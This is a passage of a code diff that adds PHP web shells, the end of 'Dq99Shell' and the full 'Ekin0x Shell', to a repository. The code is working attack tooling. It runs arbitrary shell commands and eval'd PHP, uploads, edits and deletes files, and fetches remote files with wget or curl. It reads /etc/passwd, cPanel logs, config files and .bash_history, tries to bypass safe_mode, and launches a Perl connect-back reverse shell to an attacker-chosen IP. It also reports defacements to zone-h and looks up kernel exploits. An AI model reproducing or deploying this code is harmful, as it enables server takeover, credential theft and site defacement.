array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +function parsesort($sort) { + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +function view_perms_color($o) { + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +function str2mini($content,$len) { + if (strlen($content) > $len) { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } else {return $content;} +} +function strips(&$arr,$k="") { + if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } } + else { $arr = stripslashes($arr); } +} + +function getmicrotime() { + list($usec, $sec) = explode(" ", microtime()); + return ((float)$usec + (float)$sec); +} + +function milw0rm() { + $Lversion = php_uname(r); + $OSV = php_uname(s); + if(eregi("Linux",$OSV)) { + $Lversion = substr($Lversion,0,6); + return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion; + } else { + $Lversion = substr($Lversion,0,3); + return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; + } +} +function tools() { + echo "List of tools"; +} + +function sh_name() { return base64_decode("ZGlLaSBkUTk5c2hlbGwgdg==").sh_ver; } +function htmlhead($safemode) { +$style = ' + +'; +$html_start = ' + +'.getenv("HTTP_HOST").' - '.sh_name().' +'.$style.' + + + +

        '.sh_name().'

        .: r57.biz Dq99Shell :.
        +'; +return $html_start; +}; +function footer() { + echo "
        By www.r57.biz, © 2008 FeeLCoMz Community, Generated: ".round(getmicrotime()-starttime,4)." seconds
        "; +} +chdir($lastdir); dQ99shexit(); +?> \ No newline at end of file diff --git a/php/ekin0x.php b/php/ekin0x.php new file mode 100644 index 0000000..1ae3a10 --- /dev/null +++ b/php/ekin0x.php @@ -0,0 +1,607 @@ +";print"
        $delmtxt
        ";} +function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); +$nscmd=htmlspecialchars($scmd);print $nscmd;} +elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); +$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} +elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); +while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; +print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ +ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ +ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); +print htmlspecialchars($pret);}} +function input($type,$name,$value,$size) +{if (empty($value)){print "";} +elseif(empty($name)&&empty($size)){print "";} +elseif(empty($size)){print "";} +else {print "";}} +function permcol($path){if (is_writable($path)){print ""; +callperms($path); print "";} +elseif (!is_readable($path)&&!is_writable($path)){print ""; +callperms($path); print "";} +else {print "";callperms($path);}} +if ($dlink=="dwld"){download($_REQUEST['dwld']);} +function download($dwfile) {$size = filesize($dwfile); +@header("Content-Type: application/force-download;name=$dwfile"); +@header("Content-Transfer-Encoding: binary"); +@header("Content-Length: $size"); +@header("Content-Disposition: attachment; filename=$dwfile"); +@header("Expires: 0"); +@header("Cache-Control: no-cache, must-revalidate"); +@header("Pragma: no-cache"); +@readfile($dwfile); exit;} +?> + + +Ekin0x Shell + + + + + +$sf="
        ";$ef="
        "; +$st=""; +$et="
        ";$c1=""; +$c2="";$ec=""; +$sta=""; +$sfnt="";$efnt=""; +################# Ending of common variables ######################## + +print"";print"";print"
        "; print"
        ## Ekin0x Shell ## +
        "; print"
        ";print "
        "; +print"";print"";print"
        "; print"
        ";print "Home"; +print " - Geri"; +print " - phpinfo"; +if ($dlink=='phpinfo'){print phpinfo();die();} +print " - Base64 decode"; +print " - Url decode"; +print " - Url encode"; +print " - Md5"; +print " - Izinleri Kontrol Et"; +print " - File source"; +print " - Quick index"; +print " - Zone-h"; +print " - Mail"; +print " - Cmd help"; +if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase'])); +print "

        Result is : $sfnt".$cbase."$efnt"; die();} +if ($dlink=="basepw"){ print "

        [ Base64 - Decoder ]"; +print $sf;input ("text","ncbase",$ncbase,35);print " "; +input ("submit","","Decode","");print $ef; die();} +if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld'])); +print "

        Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){ +print "

        [ Url - Decoder ]"; print $sf; +input ("text","nurld",$nurld,35);print " "; +input ("submit","","Decode","");print $ef; die();} +if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "

        Result is : $sfnt".$urlenc."$efnt"; die();} +if ($dlink=='urlen'){print "

        [ Url - Encoder ]"; +print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();} +if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf'])); +print "

        Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){ +print "

        [ MD5 - Encoder ]"; +print $sf;input ("text","nmdf",$nmdf,35);print " "; +input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef; +print "

        ";print "

        ";print "

        ";die();} +function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){ +print "

        [ Sorry, U choosed an empty file or the file not exists ]";die();} +elseif(isset($showsc)&&filesize($showsc) !=="0") { +print "

        "; +if (!show_source($showsc)||!function_exists('show_source')){print "
        [ Sorry can't complete the operation ]
        ";die();}print "
        ";die();}}if ($dlink=='showsrc'){ +print "

        : Choose a php file to view in a color mode, any extension else will appears as usual :";print "

        "; +input ("text","showsc","",35);print " "; +input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));} +if ($dlink=='cmdhlp'){ +print "

        : Insert the command below to get help or to know more about it's uses :";print ""; +input ("text","hlp","",35);print " "; +input ("submit","","Help","");print $ef; die();} +if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp']; +print "

        [ The command is $sfnt".$hlp."$efnt ]"; +$hlp = escapeshellcmd($hlp);print "

        "; +if (!function_exists(shell_exec)&&!function_exists(exec)&& +!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "
        [ Sorry can't complete the operation ]
        ";}else {print "
        ";
        +if(!callfuncs("man $hlp | col -b")){print "
        [ Finished !! ]";}print "
        ";}print "
        ";die();} +if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) +{if (touch ($_REQUEST['indx'])==true){ +$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); +fclose($fp);print "

        [ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]

        ";print "
        [ Yeniden Editle +] -- [ Curr-Dir ]
        ";die(); }else {print "

        [ Sorry, Can't create the index !! ]

        ";die();}} +if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ +print $sf."
        ";print "

        "; +input ("text","indx","Index-name",35);print " "; +input ("submit","qindsub","Create","");print $ef;die();} +if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ +$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; +if (mail($mailto,$subj,$mailtxt)){print "

        [ Mail sended to $sfnt".$mailto." $efnt successfully ]

        "; die();}else {print "

        [ Error, Can't send the mail ]

        ";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "

        [ Error, Can't send the mail ]

        ";die();} +if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ +print $sf."
        ";print "

        ";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; +input ("submit","mailsub","Send-mail","");print $ef;die();} +if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} +function callzone($nscdir){ +if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} +else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} +fwrite ($fpz,"\$arq = @ARGV[0]; +\$grupo = @ARGV[1]; +chomp \$grupo; +open(a,\"<\$arq\"); +@site = ; +close(a); +\$b = scalar(@site); +for(\$a=0;\$a<=\$b;\$a++) +{chomp \$site[\$a]; +if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } +print \"[+] Sending \$site[\$a]\n\"; +use IO::Socket::INET; +\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; +print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; +print \$sock \"Accept: */*\r\n\"; +print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; +print \$sock \"Accept-Language: pt-br\r\n\"; +print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; +print \$sock \"Connection: Keep-Alive\r\n\"; +print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; +print \$sock \"Host: old.zone-h.org\r\n\"; +print \$sock \"Content-Length: 385\r\n\"; +print \$sock \"Pragma: no-cache\r\n\"; +print \$sock \"\r\n\"; +print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; +close(\$sock);}"); +if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); +}else{print "

        [ Can't complete the operation, try change the current dir with writable one ]
        ";}$zonet=$_REQUEST['zonet']; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "[ Can't complete the operation !! ]";} +else {callfuncs("chmod 777 $zpl;chmod 777 $li"); +ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); +print "

        [ All sites should be sended to zone-h.org successfully !! ]";die();} +}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ +print $sf."
        ";print "

        ";input ("text","zonet","Hacker-name",35);print " "; +input ("submit","zonesub","Send","");print $ef;die();} +print "
        "; print"
        ";print "
        "; +function inisaf($iniv) { $chkini=ini_get($iniv); +if(($chkini || strtolower($chkini)) !=='on'){print"Kapali ( Guvenlik Yok )";} else{ +print"Acik ( Guvenli )";}}function inifunc($inif){$chkin=ini_get($inif); +if ($chkin==""){print " None";} +else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} +elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); +while (!feof($opop)){ $nval= fgetc($opop);}} +elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ +ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} +if($nval=$owhich){print"ON";} +else{print"OFF";} } +print""; +print"
        "; print"

        "; +print"Safe-mode :\t";print inisaf('safe_mode');print "";print"
        "; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print ""; print""; print""; print""; print""; print""; print""; print "
        "; +print "
        "; print"
        Mysql : "; +callocmd('which mysql','/usr/bin/mysql'); +print"
        "; print"
        Perl : "; +callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"
        "; print"
        Gcc : "; +callocmd('which gcc','/usr/bin/gcc'); print"
        "; +print"
        Curl : "; callocmd('which curl','/usr/bin/curl'); print"
        "; print"
        GET : "; +callocmd('which GET','/usr/bin/GET'); +print"
        ";print"
        Wget : "; +callocmd('which wget','/usr/bin/wget'); +print"
        "; print"
        Lynx : "; +callocmd('which lynx','/usr/bin/lynx'); +print"
        "; }print "

        "; +print "IP Numaran : ".$REMOTE_ADDR."
        "; +print "Server IP : ".$SERVER_ADDR.""; +print"
        ".$SERVER_SIGNATURE.""; +print "Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."
        "; +print "Engelli Fonksiyonlar : ";inifunc(disable_functions);print"
        "; +print "Kimsin : "; callfuncs('id');print"
        Os : "; +if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else { +if (!function_exists(shell_exec)&&!function_exists(exec)&& +!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print php_uname(); print "/";print PHP_OS;} +else {callfuncs('uname -a');}}print"
        "; +print"Php-versiyon : ".phpversion(); print"
        Current-path : "; +print $nscdir."     [ ";permcol($nscdir);print " ]"; +print"
        ";print "Shell'in Burda : " .__file__; +print"
        Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / "; +print"Bos Alan: "; readable_size(disk_free_space($nscdir)); +print "
        "; print"

        "; +if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); +if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; } +else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir'])) +{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} +else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){ +$ncfile=trim($_REQUEST['cfile']); +if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} +else{ $mess3= "Dosya Olustur/Sil";}} +elseif(isset($_REQUEST['delfile'])){ +$ndfile=trim($_REQUEST['cfile']); +if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} +else {$mess3= "Dosya Olustur/Sil";}} +else {$mess3="Dosya Olustur/Sil";} +class upload{ function upload($file,$tmp){ +$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";} +if (@copy($tmp,$nscdir."/".$file)){ +print "
        : $file uploaded successfully :
        "; }else{print "
        : Error uploading $file :
        ";} } } } +$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){ +$ustname=trim ($_REQUEST['ustname']);ob_start(); +if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);} +if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');} +if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');} +if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');} +if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);} +if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);} +if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);} +if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);} +if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();} +if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&& +!isset($_REQUEST['rfiletxt'])){ +if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){ +$files[] = $filename; sort($files);}print "
        "; +print"
        "; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print "";if(strstr(PHP_OS,"Linux")){ +print "";} +print ""; foreach ($files as $nfiles){ +if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");} +if (is_writable("$nscdir/$nfiles")){ +$scmess2= "
        Evet";}else {$scmess2="
        Hayir";}if (is_readable("$nscdir/$nfiles")){ +$scmess3= "
        Evet";}else {$scmess3= "
        Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "
        Klasör";}else{$scmess4= "
        Dosya";} +print"
        "; print ""; print ""; +print""; +print ""; +print ""; print "";print ""; if(strstr(PHP_OS,"Linux")){ +print "";} +print ""; print ""; +}print "
        "; +print "
        Dosyalar";print "
        ";print "
        Boyut";print "
        ";print "
        Yazma";print "
        ";print "
        Okuma";print "
        ";print "
        Tür";print "
        ";print "
        Düzenleme";print "
        ";print "
        Adlandirma";print "
        ";print "
        Indir";print "
        ";print "
        Group";print "
        ";print "
        Izinler";print "
        "; +if (is_dir($nfiles)){print "[ $nfiles ]
        ";}else {print "$nfiles
        ";} +print"
        "; +print "
        "; +if (is_dir("$nscdir/$nfiles")){print "Klasör";} +elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";} +print "
        "; +print "
        $scmess2"; print "
        "; +print "
        $scmess3"; print "
        "; +print "
        $scmess4"; print"
        ";if(is_file("$nscdir/$nfiles")){ +print "
        Düzenle";}else {print "
        Düzenle
        ";}print"
        ";print "
        Adlandir";print"
        "; +if(is_file("$nscdir/$nfiles")){ +print "
        indir";}else {print "
        indir
        ";}print"
        "; +print "
        ";owgr($nfiles); +print "
        ";print"
        ";print "
        "; +permcol("$nscdir/$nfiles");print "
        ";print"
        ";print "
        ";}else {print "

        [ Can't open the Dir, permission denied !! ]

        ";}} +elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){ +if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "

        [ Executed command ][$] : ".$_REQUEST['cmd']."
        ";} +print "
        ".$sta; +if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);} +elseif(isset($_REQUEST['eval'])){ +ob_start();eval(stripslashes(trim($_REQUEST['eval']))); +$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);} +elseif (isset($_REQUEST['subqcmnds'])){ +if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');} +if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');} +if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');} +if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');} +if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');} +if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');} +if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');} +if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');} +if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');} +if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');} +if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');} +if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');} +if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');} +}print $eta."
        ";} +function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']); +if(is_readable($rfile)&&is_file($rfile)){ +$fp=fopen ($rfile,"r");print"
        "; +print "
        [ Editing ".basename($rfile)." ] [ Geri ] [ Curr-Dir ]

        "; +print $sf."";if (is_writable($rfile)){ +print "
        ".$ef;}else +{print "
        [ Can't edit ".basename($rfile)." ]

        ";}print "

        ";} +elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "
        [ You selected a wrong file name or you don't have access !! ]

        ";}} +function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']); +if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+"); +$rfiletxt=stripslashes($_REQUEST['rfiletxt']); +fwrite ($rffp,$rfiletxt);print "
        +[ ".basename($hidrfile)." Saved !! ] +[ Curr-Dir ] [ Edit again ] +

        ";fclose($rffp);} +else {print "
        [ Can't save the file !! ] [ Curr-Dir ] [ Back ]

        ";}} +if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);} +elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);} +function callperms($chkperms){ +$perms = fileperms($chkperms); + +if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; +} else { + // Unknown + $info = 'u'; +} + +// Owner +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + +// Group +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + +// World +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); print $info;} + + function readable_size($size) { + +if ($size < 1024) { +print $size . ' B'; +}else {$units = array("kB", "MB", "GB", "TB"); +foreach ($units as $unit) { +$size = ($size / 1024); +if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}} +if($dlink=='ren'&&!isset($_REQUEST['rensub'])){ +print ""; +print "
        ".$sf;input ("text","ren",$_REQUEST['ren'],20);print " "; +input ("text","renf","New-name",20);print " "; +input ("submit","rensub","Rename" ,"");print $ef;die();}else print ""; +if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){ +if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){ +print"
        [ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]
        ";print "";die();}else{print "
        [ Yeniden Adlandirilamiyor ]
        "; +print "";die();}}function fget($nscdir,$sf,$ef){print "
        "; +print "
        [ Editing ".basename($_REQUEST['edit'])." ] [ Geri ] [ Curr-Dir ]
        "; +print $sf."
        "; +if (is_writable($_REQUEST['edit'])){ +print "
        ".$ef;}else {print "
        [ Can't edit +".basename($_REQUEST['edit'])." ]

        ";}}function svetxt(){ +$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){ +$nedittxt=stripslashes($_REQUEST['edittxt']); +fwrite ($fp,$nedittxt);print "
        [ ".basename($_REQUEST['edit'])." Saved !! ]
        ";fclose($fp);}else {print "
        [ Can't save the file !! ]
        ";}} +if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval'])) +{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt'])) +{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){ +$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); +$fileowner=$fileownerarray['name']; $fileg=filegroup($file); +$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name']; +print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){ +if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}} +elseif(isset($_REQUEST['mve'])){ +if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);} +}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";} +if (isset ($_REQUEST['safefile'])){ +$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){ +if(empty($_GET['file'])){if(empty($_POST['file'])){ +print "
        [ Please choose a file first to read it using copy() ]
        "; +} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}} +$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){ +$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo);echo "
        ".$sta.htmlspecialchars($tekst).$eta."
        ";unlink($temp);} else { +print "
        Sorry, Can't read the selected file !! +

        ";}}if (isset ($_REQUEST['inifile'])){ +ini_restore("safe_mode");ini_restore("open_basedir"); +print "
        ".$sta;
        +if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
        ";} +if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);} +function callback($nscdir,$bip,$bport){ +if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";} +if (is_writable($nscdir)){ +$fp=fopen ("back.pl","w");$backpl='back.pl';} +else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';} +fwrite ($fp,"use Socket; +\$system='$epath'; +\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\"; +echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo; +echo \"[ User perms ][$]\";echo \"`id`\";echo; +echo \"[ Start shell ][$]\";'; + +if (!\$ARGV[0]) { + exit(1); +} +\$host = \$ARGV[0]; +\$port = 80; +if (\$ARGV[1]) { + \$port = \$ARGV[1]; +} +\$proto = getprotobyname('tcp') || die('Unknown Protocol\n'); +socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n'); +my \$target = inet_aton(\$host); +if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) { + die('Unable to Connect\n'); +} +if (!fork( )) { + open(STDIN,'>&SERVER'); + open(STDOUT,'>&SERVER'); + open(STDERR,'>&SERVER'); +print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]'; +print '\n[ A-S-T team ][ Lezr.com ]\n\n'; + system(\$sys);system (\$system); + exit(0); } + ");callfuncs("chmod 777 $backpl"); +ob_start(); +callfuncs("perl $backpl $bip $bport"); +ob_clean(); +print "
        [ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]
        +[ Check your connection now, if failed try changing the port number ]
        +[ Or Go to a writable dir and then try to connect again ]
        +[ Return to the Current dir ] [ Curr-Dir ] +

        ";}if (isset($_REQUEST['uback'])){ +$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; +if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");} +elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");} +elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}} +delm("# Komut ÇAlistir #");print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +delm("");print "
        "; +print $st.$c1."
        ".$mess3.$ec; +print $c2.$sf."
        ";input("text","cfile","",53); +input("hidden","scdir",$nscdir,0);print "
        "; +input("submit","crefile","Olustur",""); +print " ";input("submit","delfile","Sil",""); +print "
        ".$ef.$ec.$et."
        ".$st.$c1; +print "
        Enter the command to execute";print $ec; +print $c2.$sf."
        "; +input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"
        "; +input("submit","","Execute","");print "
        ".$ef.$ec.$et."
        ";print $st.$c1; +print "
        $mess".$ec.$c2.$sf."
        "; +input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "
        "; +input("submit","credir","Create-D","");print " "; +input("submit","deldir","Delete-D",""); +print "
        ".$ef.$ec.$et."
        ";print $st.$c1; +print "
        Dosya Düzenle/Oku".$ec;print $c2.$sf."
        "; +input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "
        "; +input("submit","","Oku-Düzenle","");print "
        ".$ef.$ec.$et."
        ";print $st.$c1; +print "
        Dizin'i Göster
        ";print $ec.$c2.$sf."
        "; input("text","scdir",$nscdir,59);print"
        "; +input("submit","","Göster","");print " "; +input("reset","","R00T","");print "
        ".$ef.$ec.$et."
        ";print $st.$c1; +print "
        Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."
        "; +input("file","upfile","",40);input("hidden","scdir",$nscdir,0); +input("hidden","up",$nscdir,0); +print"
        ";input("submit","","Upload","");print "
        ".$ef.$ec.$et."
        ";print "
        "; +print $st.$c1."
        Execute php code with eval()
        "; +print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); +print " 
        "; +input('submit','evsub','Execute');print " "; +input('Reset','','Reset');print " "; +print "
        ".$ec.$ef.$et; +print "
        "; +print $st.$c1."
        Execute useful commands
